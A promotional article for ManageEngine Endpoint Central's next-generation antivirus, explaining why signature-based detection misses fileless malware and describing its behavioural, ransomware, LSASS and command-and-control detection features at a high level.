In the year 2023, security analysts at ReliaQuest published a finding that stunned even veteran defenders: 86.2% of critical customer incidents that year involved fileless malware. Not exotic zero-days, not sophisticated nation-state implants. Fileless malware code that runs entirely in memory abuses legitimate Windows tools and leaves almost nothing on disk for a traditional antivirus scanner to find.
The tools being abused were not obscure. They were PowerShell, WMI, or system memory (also known as Lotl, or Living-off-the-land binaries), utilities that ship with every copy of Windows and are essential for normal system operations. The most commonly exploited Lotl’s like rundll32, msiexec were involved in 92% of all fileless detections.
According to a recent report, Fileless malware attacks have surged by 78% since 2024. Available data highlights a key challenge: much of today’s malware activity leaves no traditional file artefacts for scanners to inspect.
How signature-based detection works and why it breaks
Traditional antivirus software operates on a conceptually simple principle. Security researchers capture samples of known malware, extract unique signatures and distribute those patterns as definition files. The antivirus engine then scans every file on the endpoint, comparing it byte-by-byte against its signature database. A match triggers a detection. No match, no alert.
This approach worked tolerably well for decades because malware was fundamentally a file. It landed on disk as an executable, a DLL, or a script and it had a consistent binary structure.
Because early malware variants changed slowly, a single signature could catch thousands of infections. Shifts in the threat landscape have steadily eroded that model.
Polymorphic & metamorphic malware
Modern malware routinely mutates its own code with every infection, changing its binary structure just enough to evade signature-based detection. A single byte change throws off the signature match, rendering the scan useless.
Fileless execution
Fileless malware never touches the disk in the traditional sense. It executes in memory via PowerShell scripts, WMI commands, or injected DLLs. Since there is no persistent file to scan, signature-based detection has nothing to analyze. These attacks manipulate the command lines of trusted applications, allowing malicious activity to blend in with authorized operations.
Speed of new variants
The volume of novel malware samples now exceeds the capacity of any human-driven signature-creation pipeline. Traditional antivirus solutions detect malware only after the first infection and require constant, day-to-day definition updates. By the time a signature is written, tested, and deployed, the variant has often already mutated into something new.
Traditional antivirus solutions only detect malware after the first infection and require constant, day-to-day definition updates because they rely on signature-based detection.
The behavioural shift
Behaviour-based detection works because attackers can change code quickly, but the actions malware must perform remain tied to its intent. Ransomware always needs to browse files, encrypt them, and write the encrypted versions back. Trojans always need to establish outbound connections. Keyloggers must intercept input events. Data exfiltration always involves abnormal upload volumes to unfamiliar destinations.
By monitoring what a program actually does at runtime (system calls, file operations, network connections, registry modifications) a behavioural detection engine can identify malicious intent without ever examining a single byte of the program’s code.
This is the core architecture behind ManageEngine’s Endpoint Central’s next-generation antivirus (NGAV) engine, powering endpoint security. Rather than relying on a single detection method, the solution deploys a multi-layered detection strategy that combines machine learning, behaviour analysis, and deep learning with other distinct threat detection capabilities. Each layer targets a different stage of the attack lifecycle, creating a system where evading one layer still leaves the attacker exposed to the next.
AI-assisted behavioural detection: Distinguishing the ordinary from the suspicious
At the core of Endpoint Central is its AI-assisted behavioural detection engine. It monitors API calls, process injections, and lateral movement across every running process on the endpoint.
The system first establishes a baseline of normal activity, how legitimate applications behave and interact with the operating system. Once that baseline is set, it detects deviations such as unusual API calls, code injection attempts, or unexpected lateral movements.
It flags anomalies like suspicious process execution, unexpected file modifications, and abnormal access patterns. These early warning signals are structurally beyond the reach of signature-based tools.
Fileless malware detection: Seeing what never touches the disk
Fileless malware dominates modern attacks because it avoids writing files to disk. PowerShell abuse, WMI execution, and in-memory payloads leave nothing for traditional scanners to detect.
Endpoint Central includes dedicated controls designed to detect fileless activity. It monitors memory processes, identifies DLL injections, and intercepts malicious use of living-off-the-land (Lotl) binaries.
For instance, an attacker may execute a payload entirely in memory via an exploit, inject a malicious DLL into a legitimate process like svchost.exe, exfiltrates data, and remove the payload without ever writing it to disk, leaving signature-based scanners with nothing to detect. Endpoint Central detects it by inspecting memory directly, uncovering injected code, shellcode execution, and suspicious DLL loading.
Ransomware blocking: Intent over identity
Ransomware changes its binary form constantly, but its behaviour remains consistent. Every strain must access, encrypt, and modify files at scale.
Endpoint Central detects patterns and isolates affected endpoints to prevent spread. Its behaviour analytics engine is designed to detect ransomware activity early by identifying abnormal encryption patterns. Behaviour-based detection resists evasion more effectively than signature matching.
If encryption occurs, the system rolls back changes using secure, tamper-proof backups. It operates in two modes: investigative audit mode for logging and evaluation, and active kill mode for automatic termination, quarantine, and recovery.
Memory exploit prevention: Guarding the runtime
Some attacks exploit system memory directly through buffer overflows, ROP chains, and stack manipulation. Endpoint Central provides runtime memory protection that detects injection attempts and blocks memory corruption.
It also delivers zero-day exploit shielding by monitoring kernel-level activity and stopping unknown exploits before patches are available. For IT teams that cannot patch instantly, this provides critical protection time.
Deep memory scanning for stealth threats: On-demand forensic layer
Advanced malware hides within trusted processes like explorer.exe to avoid detection. Endpoint Central offers on-demand full memory scanning to uncover hidden shellcode and payloads by inspecting the live runtime state of memory.
Unlike traditional antivirus that scans files after they are written, Endpoint Central scans files at the moment of creation, eliminating the gap that fast-moving malware exploits.
Credential hardening & LSASS protection
Every Windows endpoint runs a process called the Local Security Authority Subsystem Service (lsass.exe), which manages authentication and access tokens. Tools like Mimikatz can extract credential hashes directly from LSASS memory, enabling attackers to move laterally without cracking passwords.
Endpoint Central prevents LSASS memory dumping and detects suspicious credential access attempts. In enterprise environments, this blocks one of the most exploited attack paths.
Living-Off-The-Land attack prevention
Living Off The Land Attackers frequently abuse legitimate Windows tools such as PowerShell, WMI, RDP, rundll32, msiexec, and mshta. These tools are built into the system and require no malicious files.
Endpoint Central detects encoded PowerShell commands, abnormal script execution, and suspicious lateral movement through RDP or WMI. It distinguishes between legitimate administrative activity and malicious behaviour through contextual analysis.
This closes a critical gap where signature-based antivirus cannot operate because the binaries involved are legitimate and signed.
Intent-based detection (Indicators of attack)
Most tools rely on indicators of compromise such as file hashes or malicious IP addresses, which confirm attacks after damage occurs.
Endpoint Central shifts to intent-based detection using indicators of attack. It identifies malicious methodologies in real time, maps the attack chain from breach to exfiltration, and intervenes early.
This integrates with Root Cause Analysis, full process tree reconstruction, MITRE ATT&CK TTP mapping, and IoC fingerprinting for correlation with threat intelligence feeds.
Command & control (C2) detection: Cutting the puppet strings
Persistent malware depends on communication with attacker-controlled servers for instructions and data exfiltration.
Endpoint Central detects beaconing patterns, domain generation algorithms, and suspicious encrypted channels that indicate command-and-control traffic. By blocking this communication, it neutralizes dormant threats, including advanced persistent threats, even if the initial breach went unnoticed.
What happens after detection: Forensics and recovery
Detection alone is not sufficient. Security teams need context to understand how the attack unfolded and where it began. Endpoint Central resolves this by integrating comprehensive forensic and remediation capabilities into every incident.
When a threat is detected whether by the behavioural engine, the ransomware blocker, or the C2 detector, the system generates a complete incident profile:
- Root Cause Analysis (RCA) with process trees and timeline reconstruction that visualizes the full attack path, from initial access through propagation to impact.
- MITRE ATT&CK mapping that classifies the threat by tactics, techniques, and procedures, enabling proactive countermeasure deployment.
- Indicators of Compromise (IoCs) analysis — file hashes, registry keys, and filenames tied to the attack, available for cross-referencing with VirusTotal and external threat intelligence feeds.
- Malware threat intelligence, detailed detection profiles including publisher verification status, timestamps, and infected device IDs for precise incident tracking.
For remediation, Endpoint Central quarantines and disinfects malware without human intervention, restoring modified files and registries to their original, clean state. Infected devices can be isolated from the network with a single click to stop lateral movement, while remaining accessible for remote investigation. Encrypted files are restored from secure, tamper-proof incremental backups and volume shadow copies, reverting systems to their pre-infection state within minutes.
The bottom line
Signature-based antivirus was built for a world where malware was a file, variants changed slowly, and endpoints stayed on the corporate network. That world no longer exists. Fileless attacks now account for the majority of critical security incidents. And endpoints roam far beyond the corporate firewall, often disconnected from cloud security infrastructure entirely.
The detection paradigm that addresses this reality is behavioural, built on machine learning, deep learning, and anomaly detection.
ManageEngine Endpoint Central‘s intent-based malware detection, deep learning and continuous behaviour monitoring provide this capability within a unified platform.
In a world where the majority of serious incidents involve malware with no file to scan, the answer to that question determines whether a security team is detecting threats in real time or discovering them in a ransom note.
